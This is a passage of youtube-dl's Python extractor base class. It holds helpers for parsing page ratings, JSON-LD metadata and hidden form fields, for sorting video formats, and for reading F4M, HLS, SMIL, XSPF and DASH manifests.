# See http://www.rtalabel.org/index.php?content=howtofaq#single
if re.search(r'(?ix)<meta\s+name="rating"\s+'
r' content="RTA-5042-1996-1400-1577-RTA"',
html):
return 18
return 0
def _media_rating_search(self, html):
# See http://www.tjg-designs.com/WP/metadata-code-examples-adding-metadata-to-your-web-pages/
rating = self._html_search_meta('rating', html)
if not rating:
return None
RATING_TABLE = {
'safe for kids': 0,
'general': 8,
'14 years': 14,
'mature': 17,
'restricted': 19,
}
return RATING_TABLE.get(rating.lower())
def _family_friendly_search(self, html):
# See http://schema.org/VideoObject
family_friendly = self._html_search_meta(
'isFamilyFriendly', html, default=None)
if not family_friendly:
return None
RATING_TABLE = {
'1': 0,
'true': 0,
'0': 18,
'false': 18,
}
return RATING_TABLE.get(family_friendly.lower())
def _twitter_search_player(self, html):
return self._html_search_meta('twitter:player', html,
'twitter card player')
def _search_json_ld(self, html, video_id, expected_type=None, **kwargs):
json_ld = self._search_regex(
JSON_LD_RE, html, 'JSON-LD', group='json_ld', **kwargs)
default = kwargs.get('default', NO_DEFAULT)
if not json_ld:
return default if default is not NO_DEFAULT else {}
# JSON-LD may be malformed and thus `fatal` should be respected.
# At the same time `default` may be passed that assumes `fatal=False`
# for _search_regex. Let's simulate the same behavior here as well.
fatal = kwargs.get('fatal', True) if default == NO_DEFAULT else False
return self._json_ld(json_ld, video_id, fatal=fatal, expected_type=expected_type)
def _json_ld(self, json_ld, video_id, fatal=True, expected_type=None):
if isinstance(json_ld, compat_str):
json_ld = self._parse_json(json_ld, video_id, fatal=fatal)
if not json_ld:
return {}
info = {}
if not isinstance(json_ld, (list, tuple, dict)):
return info
if isinstance(json_ld, dict):
json_ld = [json_ld]
INTERACTION_TYPE_MAP = {
'CommentAction': 'comment',
'AgreeAction': 'like',
'DisagreeAction': 'dislike',
'LikeAction': 'like',
'DislikeAction': 'dislike',
'ListenAction': 'view',
'WatchAction': 'view',
'ViewAction': 'view',
}
def extract_interaction_statistic(e):
interaction_statistic = e.get('interactionStatistic')
if not isinstance(interaction_statistic, list):
return
for is_e in interaction_statistic:
if not isinstance(is_e, dict):
continue
if is_e.get('@type') != 'InteractionCounter':
continue
interaction_type = is_e.get('interactionType')
if not isinstance(interaction_type, compat_str):
continue
interaction_count = int_or_none(is_e.get('userInteractionCount'))
if interaction_count is None:
continue
count_kind = INTERACTION_TYPE_MAP.get(interaction_type.split('/')[-1])
if not count_kind:
continue
count_key = '%s_count' % count_kind
if info.get(count_key) is not None:
continue
info[count_key] = interaction_count
def extract_video_object(e):
assert e['@type'] == 'VideoObject'
info.update({
'url': e.get('contentUrl'),
'title': unescapeHTML(e.get('name')),
'description': unescapeHTML(e.get('description')),
'thumbnail': e.get('thumbnailUrl') or e.get('thumbnailURL'),
'duration': parse_duration(e.get('duration')),
'timestamp': unified_timestamp(e.get('uploadDate')),
'filesize': float_or_none(e.get('contentSize')),
'tbr': int_or_none(e.get('bitrate')),
'width': int_or_none(e.get('width')),
'height': int_or_none(e.get('height')),
'view_count': int_or_none(e.get('interactionCount')),
})
extract_interaction_statistic(e)
for e in json_ld:
if isinstance(e.get('@context'), compat_str) and re.match(r'^https?://schema.org/?$', e.get('@context')):
item_type = e.get('@type')
if expected_type is not None and expected_type != item_type:
return info
if item_type in ('TVEpisode', 'Episode'):
info.update({
'episode': unescapeHTML(e.get('name')),
'episode_number': int_or_none(e.get('episodeNumber')),
'description': unescapeHTML(e.get('description')),
})
part_of_season = e.get('partOfSeason')
if isinstance(part_of_season, dict) and part_of_season.get('@type') in ('TVSeason', 'Season', 'CreativeWorkSeason'):
info['season_number'] = int_or_none(part_of_season.get('seasonNumber'))
part_of_series = e.get('partOfSeries') or e.get('partOfTVSeries')
if isinstance(part_of_series, dict) and part_of_series.get('@type') in ('TVSeries', 'Series', 'CreativeWorkSeries'):
info['series'] = unescapeHTML(part_of_series.get('name'))
elif item_type in ('Article', 'NewsArticle'):
info.update({
'timestamp': parse_iso8601(e.get('datePublished')),
'title': unescapeHTML(e.get('headline')),
'description': unescapeHTML(e.get('articleBody')),
})
elif item_type == 'VideoObject':
extract_video_object(e)
continue
video = e.get('video')
if isinstance(video, dict) and video.get('@type') == 'VideoObject':
extract_video_object(video)
break
return dict((k, v) for k, v in info.items() if v is not None)
@staticmethod
def _hidden_inputs(html):
html = re.sub(r'<!--(?:(?!<!--).)*-->', '', html)
hidden_inputs = {}
for input in re.findall(r'(?i)(<input[^>]+>)', html):
attrs = extract_attributes(input)
if not input:
continue
if attrs.get('type') not in ('hidden', 'submit'):
continue
name = attrs.get('name') or attrs.get('id')
value = attrs.get('value')
if name and value is not None:
hidden_inputs[name] = value
return hidden_inputs
def _form_hidden_inputs(self, form_id, html):
form = self._search_regex(
r'(?is)<form[^>]+?id=(["\'])%s\1[^>]*>(?P<form>.+?)</form>' % form_id,
html, '%s form' % form_id, group='form')
return self._hidden_inputs(form)
def _sort_formats(self, formats, field_preference=None):
if not formats:
raise ExtractorError('No video formats found')
for f in formats:
# Automatically determine tbr when missing based on abr and vbr (improves
# formats sorting in some cases)
if 'tbr' not in f and f.get('abr') is not None and f.get('vbr') is not None:
f['tbr'] = f['abr'] + f['vbr']
def _formats_key(f):
# TODO remove the following workaround
from ..utils import determine_ext
if not f.get('ext') and 'url' in f:
f['ext'] = determine_ext(f['url'])
if isinstance(field_preference, (list, tuple)):
return tuple(
f.get(field)
if f.get(field) is not None
else ('' if field == 'format_id' else -1)
for field in field_preference)
preference = f.get('preference')
if preference is None:
preference = 0
if f.get('ext') in ['f4f', 'f4m']: # Not yet supported
preference -= 0.5
protocol = f.get('protocol') or determine_protocol(f)
proto_preference = 0 if protocol in ['http', 'https'] else (-0.5 if protocol == 'rtsp' else -0.1)
if f.get('vcodec') == 'none': # audio only
preference -= 50
if self._downloader.params.get('prefer_free_formats'):
ORDER = ['aac', 'mp3', 'm4a', 'webm', 'ogg', 'opus']
else:
ORDER = ['webm', 'opus', 'ogg', 'mp3', 'aac', 'm4a']
ext_preference = 0
try:
audio_ext_preference = ORDER.index(f['ext'])
except ValueError:
audio_ext_preference = -1
else:
if f.get('acodec') == 'none': # video only
preference -= 40
if self._downloader.params.get('prefer_free_formats'):
ORDER = ['flv', 'mp4', 'webm']
else:
ORDER = ['webm', 'flv', 'mp4']
try:
ext_preference = ORDER.index(f['ext'])
except ValueError:
ext_preference = -1
audio_ext_preference = 0
return (
preference,
f.get('language_preference') if f.get('language_preference') is not None else -1,
f.get('quality') if f.get('quality') is not None else -1,
f.get('tbr') if f.get('tbr') is not None else -1,
f.get('filesize') if f.get('filesize') is not None else -1,
f.get('vbr') if f.get('vbr') is not None else -1,
f.get('height') if f.get('height') is not None else -1,
f.get('width') if f.get('width') is not None else -1,
proto_preference,
ext_preference,
f.get('abr') if f.get('abr') is not None else -1,
audio_ext_preference,
f.get('fps') if f.get('fps') is not None else -1,
f.get('filesize_approx') if f.get('filesize_approx') is not None else -1,
f.get('source_preference') if f.get('source_preference') is not None else -1,
f.get('format_id') if f.get('format_id') is not None else '',
)
formats.sort(key=_formats_key)
def _check_formats(self, formats, video_id):
if formats:
formats[:] = filter(
lambda f: self._is_valid_url(
f['url'], video_id,
item='%s video format' % f.get('format_id') if f.get('format_id') else 'video'),
formats)
@staticmethod
def _remove_duplicate_formats(formats):
format_urls = set()
unique_formats = []
for f in formats:
if f['url'] not in format_urls:
format_urls.add(f['url'])
unique_formats.append(f)
formats[:] = unique_formats
def _is_valid_url(self, url, video_id, item='video', headers={}):
url = self._proto_relative_url(url, scheme='http:')
# For now assume non HTTP(S) URLs always valid
if not (url.startswith('http://') or url.startswith('https://')):
return True
try:
self._request_webpage(url, video_id, 'Checking %s URL' % item, headers=headers)
return True
except ExtractorError as e:
if isinstance(e.cause, compat_urllib_error.URLError):
self.to_screen(
'%s: %s URL is invalid, skipping' % (video_id, item))
return False
raise
def http_scheme(self):
""" Either "http:" or "https:", depending on the user's preferences """
return (
'http:'
if self._downloader.params.get('prefer_insecure', False)
else 'https:')
def _proto_relative_url(self, url, scheme=None):
if url is None:
return url
if url.startswith('//'):
if scheme is None:
scheme = self.http_scheme()
return scheme + url
else:
return url
def _sleep(self, timeout, video_id, msg_template=None):
if msg_template is None:
msg_template = '%(video_id)s: Waiting for %(timeout)s seconds'
msg = msg_template % {'video_id': video_id, 'timeout': timeout}
self.to_screen(msg)
time.sleep(timeout)
def _extract_f4m_formats(self, manifest_url, video_id, preference=None, f4m_id=None,
transform_source=lambda s: fix_xml_ampersands(s).strip(),
fatal=True, m3u8_id=None):
manifest = self._download_xml(
manifest_url, video_id, 'Downloading f4m manifest',
'Unable to download f4m manifest',
# Some manifests may be malformed, e.g. prosiebensat1 generated manifests
# (see https://github.com/rg3/youtube-dl/issues/6215#issuecomment-121704244)
transform_source=transform_source,
fatal=fatal)
if manifest is False:
return []
return self._parse_f4m_formats(
manifest, manifest_url, video_id, preference=preference, f4m_id=f4m_id,
transform_source=transform_source, fatal=fatal, m3u8_id=m3u8_id)
def _parse_f4m_formats(self, manifest, manifest_url, video_id, preference=None, f4m_id=None,
transform_source=lambda s: fix_xml_ampersands(s).strip(),
fatal=True, m3u8_id=None):
# currently youtube-dl cannot decode the playerVerificationChallenge as Akamai uses Adobe Alchemy
akamai_pv = manifest.find('{http://ns.adobe.com/f4m/1.0}pv-2.0')
if akamai_pv is not None and ';' in akamai_pv.text:
playerVerificationChallenge = akamai_pv.text.split(';')[0]
if playerVerificationChallenge.strip() != '':
return []
formats = []
manifest_version = '1.0'
media_nodes = manifest.findall('{http://ns.adobe.com/f4m/1.0}media')
if not media_nodes:
manifest_version = '2.0'
media_nodes = manifest.findall('{http://ns.adobe.com/f4m/2.0}media')
# Remove unsupported DRM protected media from final formats
# rendition (see https://github.com/rg3/youtube-dl/issues/8573).
media_nodes = remove_encrypted_media(media_nodes)
if not media_nodes:
return formats
manifest_base_url = get_base_url(manifest)
bootstrap_info = xpath_element(
manifest, ['{http://ns.adobe.com/f4m/1.0}bootstrapInfo', '{http://ns.adobe.com/f4m/2.0}bootstrapInfo'],
'bootstrap info', default=None)
vcodec = None
mime_type = xpath_text(
manifest, ['{http://ns.adobe.com/f4m/1.0}mimeType', '{http://ns.adobe.com/f4m/2.0}mimeType'],
'base URL', default=None)
if mime_type and mime_type.startswith('audio/'):
vcodec = 'none'
for i, media_el in enumerate(media_nodes):
tbr = int_or_none(media_el.attrib.get('bitrate'))
width = int_or_none(media_el.attrib.get('width'))
height = int_or_none(media_el.attrib.get('height'))
format_id = '-'.join(filter(None, [f4m_id, compat_str(i if tbr is None else tbr)]))
# If <bootstrapInfo> is present, the specified f4m is a
# stream-level manifest, and only set-level manifests may refer to
# external resources. See section 11.4 and section 4 of F4M spec
if bootstrap_info is None:
media_url = None
# @href is introduced in 2.0, see section 11.6 of F4M spec
if manifest_version == '2.0':
media_url = media_el.attrib.get('href')
if media_url is None:
media_url = media_el.attrib.get('url')
if not media_url:
continue
manifest_url = (
media_url if media_url.startswith('http://') or media_url.startswith('https://')
else ((manifest_base_url or '/'.join(manifest_url.split('/')[:-1])) + '/' + media_url))
# If media_url is itself a f4m manifest do the recursive extraction
# since bitrates in parent manifest (this one) and media_url manifest
# may differ leading to inability to resolve the format by requested
# bitrate in f4m downloader
ext = determine_ext(manifest_url)
if ext == 'f4m':
f4m_formats = self._extract_f4m_formats(
manifest_url, video_id, preference=preference, f4m_id=f4m_id,
transform_source=transform_source, fatal=fatal)
# Sometimes stream-level manifest contains single media entry that
# does not contain any quality metadata (e.g. http://matchtv.ru/#live-player).
# At the same time parent's media entry in set-level manifest may
# contain it. We will copy it from parent in such cases.
if len(f4m_formats) == 1:
f = f4m_formats[0]
f.update({
'tbr': f.get('tbr') or tbr,
'width': f.get('width') or width,
'height': f.get('height') or height,
'format_id': f.get('format_id') if not tbr else format_id,
'vcodec': vcodec,
})
formats.extend(f4m_formats)
continue
elif ext == 'm3u8':
formats.extend(self._extract_m3u8_formats(
manifest_url, video_id, 'mp4', preference=preference,
m3u8_id=m3u8_id, fatal=fatal))
continue
formats.append({
'format_id': format_id,
'url': manifest_url,
'manifest_url': manifest_url,
'ext': 'flv' if bootstrap_info is not None else None,
'protocol': 'f4m',
'tbr': tbr,
'width': width,
'height': height,
'vcodec': vcodec,
'preference': preference,
})
return formats
def _m3u8_meta_format(self, m3u8_url, ext=None, preference=None, m3u8_id=None):
return {
'format_id': '-'.join(filter(None, [m3u8_id, 'meta'])),
'url': m3u8_url,
'ext': ext,
'protocol': 'm3u8',
'preference': preference - 100 if preference else -100,
'resolution': 'multiple',
'format_note': 'Quality selection URL',
}
def _extract_m3u8_formats(self, m3u8_url, video_id, ext=None,
entry_protocol='m3u8', preference=None,
m3u8_id=None, note=None, errnote=None,
fatal=True, live=False):
res = self._download_webpage_handle(
m3u8_url, video_id,
note=note or 'Downloading m3u8 information',
errnote=errnote or 'Failed to download m3u8 information',
fatal=fatal)
if res is False:
return []
m3u8_doc, urlh = res
m3u8_url = urlh.geturl()
return self._parse_m3u8_formats(
m3u8_doc, m3u8_url, ext=ext, entry_protocol=entry_protocol,
preference=preference, m3u8_id=m3u8_id, live=live)
def _parse_m3u8_formats(self, m3u8_doc, m3u8_url, ext=None,
entry_protocol='m3u8', preference=None,
m3u8_id=None, live=False):
if '#EXT-X-FAXS-CM:' in m3u8_doc: # Adobe Flash Access
return []
if re.search(r'#EXT-X-SESSION-KEY:.*?URI="skd://', m3u8_doc): # Apple FairPlay
return []
formats = []
format_url = lambda u: (
u
if re.match(r'^https?://', u)
else compat_urlparse.urljoin(m3u8_url, u))
# References:
# 1. https://tools.ietf.org/html/draft-pantos-http-live-streaming-21
# 2. https://github.com/rg3/youtube-dl/issues/12211
# We should try extracting formats only from master playlists [1, 4.3.4],
# i.e. playlists that describe available qualities. On the other hand
# media playlists [1, 4.3.3] should be returned as is since they contain
# just the media without qualities renditions.
# Fortunately, master playlist can be easily distinguished from media
# playlist based on particular tags availability. As of [1, 4.3.3, 4.3.4]
# master playlist tags MUST NOT appear in a media playist and vice versa.
# As of [1, 4.3.3.1] #EXT-X-TARGETDURATION tag is REQUIRED for every
# media playlist and MUST NOT appear in master playlist thus we can
# clearly detect media playlist with this criterion.
if '#EXT-X-TARGETDURATION' in m3u8_doc: # media playlist, return as is
return [{
'url': m3u8_url,
'format_id': m3u8_id,
'ext': ext,
'protocol': entry_protocol,
'preference': preference,
}]
groups = {}
last_stream_inf = {}
def extract_media(x_media_line):
media = parse_m3u8_attributes(x_media_line)
# As per [1, 4.3.4.1] TYPE, GROUP-ID and NAME are REQUIRED
media_type, group_id, name = media.get('TYPE'), media.get('GROUP-ID'), media.get('NAME')
if not (media_type and group_id and name):
return
groups.setdefault(group_id, []).append(media)
if media_type not in ('VIDEO', 'AUDIO'):
return
media_url = media.get('URI')
if media_url:
format_id = []
for v in (m3u8_id, group_id, name):
if v:
format_id.append(v)
f = {
'format_id': '-'.join(format_id),
'url': format_url(media_url),
'manifest_url': m3u8_url,
'language': media.get('LANGUAGE'),
'ext': ext,
'protocol': entry_protocol,
'preference': preference,
}
if media_type == 'AUDIO':
f['vcodec'] = 'none'
formats.append(f)
def build_stream_name():
# Despite specification does not mention NAME attribute for
# EXT-X-STREAM-INF tag it still sometimes may be present (see [1]
# or vidio test in TestInfoExtractor.test_parse_m3u8_formats)
# 1. http://www.vidio.com/watch/165683-dj_ambred-booyah-live-2015
stream_name = last_stream_inf.get('NAME')
if stream_name:
return stream_name
# If there is no NAME in EXT-X-STREAM-INF it will be obtained
# from corresponding rendition group
stream_group_id = last_stream_inf.get('VIDEO')
if not stream_group_id:
return
stream_group = groups.get(stream_group_id)
if not stream_group:
return stream_group_id
rendition = stream_group[0]
return rendition.get('NAME') or stream_group_id
for line in m3u8_doc.splitlines():
if line.startswith('#EXT-X-STREAM-INF:'):
last_stream_inf = parse_m3u8_attributes(line)
elif line.startswith('#EXT-X-MEDIA:'):
extract_media(line)
elif line.startswith('#') or not line.strip():
continue
else:
tbr = float_or_none(
last_stream_inf.get('AVERAGE-BANDWIDTH') or
last_stream_inf.get('BANDWIDTH'), scale=1000)
format_id = []
if m3u8_id:
format_id.append(m3u8_id)
stream_name = build_stream_name()
# Bandwidth of live streams may differ over time thus making
# format_id unpredictable. So it's better to keep provided
# format_id intact.
if not live:
format_id.append(stream_name if stream_name else '%d' % (tbr if tbr else len(formats)))
manifest_url = format_url(line.strip())
f = {
'format_id': '-'.join(format_id),
'url': manifest_url,
'manifest_url': m3u8_url,
'tbr': tbr,
'ext': ext,
'fps': float_or_none(last_stream_inf.get('FRAME-RATE')),
'protocol': entry_protocol,
'preference': preference,
}
resolution = last_stream_inf.get('RESOLUTION')
if resolution:
mobj = re.search(r'(?P<width>\d+)[xX](?P<height>\d+)', resolution)
if mobj:
f['width'] = int(mobj.group('width'))
f['height'] = int(mobj.group('height'))
# Unified Streaming Platform
mobj = re.search(
r'audio.*?(?:%3D|=)(\d+)(?:-video.*?(?:%3D|=)(\d+))?', f['url'])
if mobj:
abr, vbr = mobj.groups()
abr, vbr = float_or_none(abr, 1000), float_or_none(vbr, 1000)
f.update({
'vbr': vbr,
'abr': abr,
})
codecs = parse_codecs(last_stream_inf.get('CODECS'))
f.update(codecs)
audio_group_id = last_stream_inf.get('AUDIO')
# As per [1, 4.3.4.1.1] any EXT-X-STREAM-INF tag which
# references a rendition group MUST have a CODECS attribute.
# However, this is not always respected, for example, [2]
# contains EXT-X-STREAM-INF tag which references AUDIO
# rendition group but does not have CODECS and despite
# referencing audio group an audio group, it represents
# a complete (with audio and video) format. So, for such cases
# we will ignore references to rendition groups and treat them
# as complete formats.
if audio_group_id and codecs and f.get('vcodec') != 'none':
audio_group = groups.get(audio_group_id)
if audio_group and audio_group[0].get('URI'):
# TODO: update acodec for audio only formats with
# the same GROUP-ID
f['acodec'] = 'none'
formats.append(f)
last_stream_inf = {}
return formats
@staticmethod
def _xpath_ns(path, namespace=None):
if not namespace:
return path
out = []
for c in path.split('/'):
if not c or c == '.':
out.append(c)
else:
out.append('{%s}%s' % (namespace, c))
return '/'.join(out)
def _extract_smil_formats(self, smil_url, video_id, fatal=True, f4m_params=None, transform_source=None):
smil = self._download_smil(smil_url, video_id, fatal=fatal, transform_source=transform_source)
if smil is False:
assert not fatal
return []
namespace = self._parse_smil_namespace(smil)
return self._parse_smil_formats(
smil, smil_url, video_id, namespace=namespace, f4m_params=f4m_params)
def _extract_smil_info(self, smil_url, video_id, fatal=True, f4m_params=None):
smil = self._download_smil(smil_url, video_id, fatal=fatal)
if smil is False:
return {}
return self._parse_smil(smil, smil_url, video_id, f4m_params=f4m_params)
def _download_smil(self, smil_url, video_id, fatal=True, transform_source=None):
return self._download_xml(
smil_url, video_id, 'Downloading SMIL file',
'Unable to download SMIL file', fatal=fatal, transform_source=transform_source)
def _parse_smil(self, smil, smil_url, video_id, f4m_params=None):
namespace = self._parse_smil_namespace(smil)
formats = self._parse_smil_formats(
smil, smil_url, video_id, namespace=namespace, f4m_params=f4m_params)
subtitles = self._parse_smil_subtitles(smil, namespace=namespace)
video_id = os.path.splitext(url_basename(smil_url))[0]
title = None
description = None
upload_date = None
for meta in smil.findall(self._xpath_ns('./head/meta', namespace)):
name = meta.attrib.get('name')
content = meta.attrib.get('content')
if not name or not content:
continue
if not title and name == 'title':
title = content
elif not description and name in ('description', 'abstract'):
description = content
elif not upload_date and name == 'date':
upload_date = unified_strdate(content)
thumbnails = [{
'id': image.get('type'),
'url': image.get('src'),
'width': int_or_none(image.get('width')),
'height': int_or_none(image.get('height')),
} for image in smil.findall(self._xpath_ns('.//image', namespace)) if image.get('src')]
return {
'id': video_id,
'title': title or video_id,
'description': description,
'upload_date': upload_date,
'thumbnails': thumbnails,
'formats': formats,
'subtitles': subtitles,
}
def _parse_smil_namespace(self, smil):
return self._search_regex(
r'(?i)^{([^}]+)?}smil$', smil.tag, 'namespace', default=None)
def _parse_smil_formats(self, smil, smil_url, video_id, namespace=None, f4m_params=None, transform_rtmp_url=None):
base = smil_url
for meta in smil.findall(self._xpath_ns('./head/meta', namespace)):
b = meta.get('base') or meta.get('httpBase')
if b:
base = b
break
formats = []
rtmp_count = 0
http_count = 0
m3u8_count = 0
srcs = []
media = smil.findall(self._xpath_ns('.//video', namespace)) + smil.findall(self._xpath_ns('.//audio', namespace))
for medium in media:
src = medium.get('src')
if not src or src in srcs:
continue
srcs.append(src)
bitrate = float_or_none(medium.get('system-bitrate') or medium.get('systemBitrate'), 1000)
filesize = int_or_none(medium.get('size') or medium.get('fileSize'))
width = int_or_none(medium.get('width'))
height = int_or_none(medium.get('height'))
proto = medium.get('proto')
ext = medium.get('ext')
src_ext = determine_ext(src)
streamer = medium.get('streamer') or base
if proto == 'rtmp' or streamer.startswith('rtmp'):
rtmp_count += 1
formats.append({
'url': streamer,
'play_path': src,
'ext': 'flv',
'format_id': 'rtmp-%d' % (rtmp_count if bitrate is None else bitrate),
'tbr': bitrate,
'filesize': filesize,
'width': width,
'height': height,
})
if transform_rtmp_url:
streamer, src = transform_rtmp_url(streamer, src)
formats[-1].update({
'url': streamer,
'play_path': src,
})
continue
src_url = src if src.startswith('http') else compat_urlparse.urljoin(base, src)
src_url = src_url.strip()
if proto == 'm3u8' or src_ext == 'm3u8':
m3u8_formats = self._extract_m3u8_formats(
src_url, video_id, ext or 'mp4', m3u8_id='hls', fatal=False)
if len(m3u8_formats) == 1:
m3u8_count += 1
m3u8_formats[0].update({
'format_id': 'hls-%d' % (m3u8_count if bitrate is None else bitrate),
'tbr': bitrate,
'width': width,
'height': height,
})
formats.extend(m3u8_formats)
elif src_ext == 'f4m':
f4m_url = src_url
if not f4m_params:
f4m_params = {
'hdcore': '3.2.0',
'plugin': 'flowplayer-3.2.0.1',
}
f4m_url += '&' if '?' in f4m_url else '?'
f4m_url += compat_urllib_parse_urlencode(f4m_params)
formats.extend(self._extract_f4m_formats(f4m_url, video_id, f4m_id='hds', fatal=False))
elif src_ext == 'mpd':
formats.extend(self._extract_mpd_formats(
src_url, video_id, mpd_id='dash', fatal=False))
elif re.search(r'\.ism/[Mm]anifest', src_url):
formats.extend(self._extract_ism_formats(
src_url, video_id, ism_id='mss', fatal=False))
elif src_url.startswith('http') and self._is_valid_url(src, video_id):
http_count += 1
formats.append({
'url': src_url,
'ext': ext or src_ext or 'flv',
'format_id': 'http-%d' % (bitrate or http_count),
'tbr': bitrate,
'filesize': filesize,
'width': width,
'height': height,
})
return formats
def _parse_smil_subtitles(self, smil, namespace=None, subtitles_lang='en'):
urls = []
subtitles = {}
for num, textstream in enumerate(smil.findall(self._xpath_ns('.//textstream', namespace))):
src = textstream.get('src')
if not src or src in urls:
continue
urls.append(src)
ext = textstream.get('ext') or mimetype2ext(textstream.get('type')) or determine_ext(src)
lang = textstream.get('systemLanguage') or textstream.get('systemLanguageName') or textstream.get('lang') or subtitles_lang
subtitles.setdefault(lang, []).append({
'url': src,
'ext': ext,
})
return subtitles
def _extract_xspf_playlist(self, xspf_url, playlist_id, fatal=True):
xspf = self._download_xml(
xspf_url, playlist_id, 'Downloading xpsf playlist',
'Unable to download xspf manifest', fatal=fatal)
if xspf is False:
return []
return self._parse_xspf(
xspf, playlist_id, xspf_url=xspf_url,
xspf_base_url=base_url(xspf_url))
def _parse_xspf(self, xspf_doc, playlist_id, xspf_url=None, xspf_base_url=None):
NS_MAP = {
'xspf': 'http://xspf.org/ns/0/',
's1': 'http://static.streamone.nl/player/ns/0',
}
entries = []
for track in xspf_doc.findall(xpath_with_ns('./xspf:trackList/xspf:track', NS_MAP)):
title = xpath_text(
track, xpath_with_ns('./xspf:title', NS_MAP), 'title', default=playlist_id)
description = xpath_text(
track, xpath_with_ns('./xspf:annotation', NS_MAP), 'description')
thumbnail = xpath_text(
track, xpath_with_ns('./xspf:image', NS_MAP), 'thumbnail')
duration = float_or_none(
xpath_text(track, xpath_with_ns('./xspf:duration', NS_MAP), 'duration'), 1000)
formats = []
for location in track.findall(xpath_with_ns('./xspf:location', NS_MAP)):
format_url = urljoin(xspf_base_url, location.text)
if not format_url:
continue
formats.append({
'url': format_url,
'manifest_url': xspf_url,
'format_id': location.get(xpath_with_ns('s1:label', NS_MAP)),
'width': int_or_none(location.get(xpath_with_ns('s1:width', NS_MAP))),
'height': int_or_none(location.get(xpath_with_ns('s1:height', NS_MAP))),
})
self._sort_formats(formats)
entries.append({
'id': playlist_id,
'title': title,
'description': description,
'thumbnail': thumbnail,
'duration': duration,
'formats': formats,
})
return entries
def _extract_mpd_formats(self, mpd_url, video_id, mpd_id=None, note=None, errnote=None, fatal=True, formats_dict={}):
res = self._download_xml_handle(
mpd_url, video_id,
note=note or 'Downloading MPD manifest',
errnote=errnote or 'Failed to download MPD manifest',
fatal=fatal)
if res is False:
return []
mpd_doc, urlh = res
mpd_base_url = base_url(urlh.geturl())
return self._parse_mpd_formats(
mpd_doc, mpd_id=mpd_id, mpd_base_url=mpd_base_url,
formats_dict=formats_dict, mpd_url=mpd_url)
def _parse_mpd_formats(self, mpd_doc, mpd_id=None, mpd_base_url='', formats_dict={}, mpd_url=None):
"""
Parse formats from MPD manifest.
References:
1. MPEG-DASH Standard, ISO/IEC 23009-1:2014(E),
http://standards.iso.org/ittf/PubliclyAvailableStandards/c065274_ISO_IEC_23009-1_2014.zip
2. https://en.wikipedia.org/wiki/Dynamic_Adaptive_Streaming_over_HTTP
"""
if mpd_doc.get('type') == 'dynamic':
return []
namespace = self._search_regex(r'(?i)^{([^}]+)?}MPD$', mpd_doc.tag, 'namespace', default=None)
def _add_ns(path):
return self._xpath_ns(path, namespace)
def is_drm_protected(element):
return element.find(_add_ns('ContentProtection')) is not None
def extract_multisegment_info(element, ms_parent_info):
ms_info = ms_parent_info.copy()
# As per [1, 5.3.9.2.2] SegmentList and SegmentTemplate share some
# common attributes and elements. We will only extract relevant
# for us.
def extract_common(source):
segment_timeline = source.find(_add_ns('SegmentTimeline'))
if segment_timeline is not None:
s_e = segment_timeline.findall(_add_ns('S'))
if s_e:
ms_info['total_number'] = 0
ms_info['s'] = []
for s in s_e:
r = int(s.get('r', 0))
ms_info['total_number'] += 1 + r
ms_info['s'].append({
't': int(s.get('t', 0)),
# @d is mandatory (see [1, 5.3.9.6.2, Table 17, page 60])
'd': int(s.attrib['d']),
'r': r,
})
start_number = source.get('startNumber')
if start_number:
ms_info['start_number'] = int(start_number)
timescale = source.get('timescale')
if timescale:
ms_info['timescale'] = int(timescale)
segment_duration = source.get('duration')
if segment_duration:
ms_info['segment_duration'] = float(segment_duration)
def extract_Initialization(source):
initialization = source.find(_add_ns('Initialization'))
if initialization is not None:
ms_info['initialization_url'] = initialization.attrib['sourceURL']
segment_list = element.find(_add_ns('SegmentList'))
if segment_list is not None:
extract_common(segment_list)
extract_Initialization(segment_list)
segment_urls_e = segment_list.findall(_add_ns('SegmentURL'))
if segment_urls_e:
ms_info['segment_urls'] = [segment.attrib['media'] for segment in segment_urls_e]
else:
segment_template = element.find(_add_ns('SegmentTemplate'))
if segment_template is not None:
extract_common(segment_template)
media = segment_template.get('media')
if media:
ms_info['media'] = media
initialization = segment_template.get('initialization')
if initialization:
ms_info['initialization'] = initialization
else:
extract_Initialization(segment_template)
return ms_info
mpd_duration = parse_duration(mpd_doc.get('mediaPresentationDuration'))
formats = []
for period in mpd_doc.findall(_add_ns('Period')):
period_duration = parse_duration(period.get('duration')) or mpd_duration
period_ms_info = extract_multisegment_info(period, {
'start_number': 1,
'timescale': 1,
})
for adaptation_set in period.findall(_add_ns('AdaptationSet')):
if is_drm_protected(adaptation_set):
continue
adaption_set_ms_info = extract_multisegment_info(adaptation_set, period_ms_info)
for representation in adaptation_set.findall(_add_ns('Representation')):
if is_drm_protected(representation):
continue
representation_attrib = adaptation_set.attrib.copy()
representation_attrib.update(representation.attrib)
# According to [1, 5.3.7.2, Table 9, page 41], @mimeType is mandatory
mime_type = representation_attrib['mimeType']
content_type = mime_type.split('/')[0]
if content_type == 'text':
# TODO implement WebVTT downloading
pass
elif content_type in ('video', 'audio'):
base_url = ''
for element in (representation, adaptation_set, period, mpd_doc):
base_url_e = element.find(_add_ns('BaseURL'))
if base_url_e is not None:
base_url = base_url_e.text + base_url
if re.match(r'^https?://', base_url):
break
if mpd_base_url and not re.match(r'^https?://', base_url):
if not mpd_base_url.endswith('/') and not base_url.startswith('/'):
mpd_base_url += '/'
base_url = mpd_base_url + base_url
representation_id = representation_attrib.get('id')
lang = representation_attrib.get('lang')
url_el = representation.find(_add_ns('BaseURL'))
filesize = int_or_none(url_el.attrib.get('{http://youtube.com/yt/2012/10/10}contentLength') if url_el is not None else None)
bandwidth = int_or_none(representation_attrib.get('bandwidth'))
f = {
'format_id': '%s-%s' % (mpd_id, representation_id) if mpd_id else representation_id,
'url': base_url,
'manifest_url': mpd_url,
'ext': mimetype2ext(mime_type),
'width': int_or_none(representation_attrib.get('width')),
'height': int_or_none(representation_attrib.get('height')),
'tbr': float_or_none(bandwidth, 1000),
'asr': int_or_none(representation_attrib.get('audioSamplingRate')),
'fps': int_or_none(representation_attrib.get('frameRate')),
'language': lang if lang not in ('mul', 'und', 'zxx', 'mis') else None,
'format_note': 'DASH %s' % content_type,
'filesize': filesize,
'container': mimetype2ext(mime_type) + '_dash',
}
f.update(parse_codecs(representation_attrib.get('codecs')))
representation_ms_info = extract_multisegment_info(representation, adaption_set_ms_info)
def prepare_template(template_name, identifiers):
tmpl = representation_ms_info[template_name]
# First of, % characters outside $...$ templates
# must be escaped by doubling for proper processing
# by % operator string formatting used further (see
# https://github.com/rg3/youtube-dl/issues/16867).
t = ''
in_template = False
for c in tmpl:
t += c
if c == '$':
in_template = not in_template
elif c == '%' and not in_template:
t += c
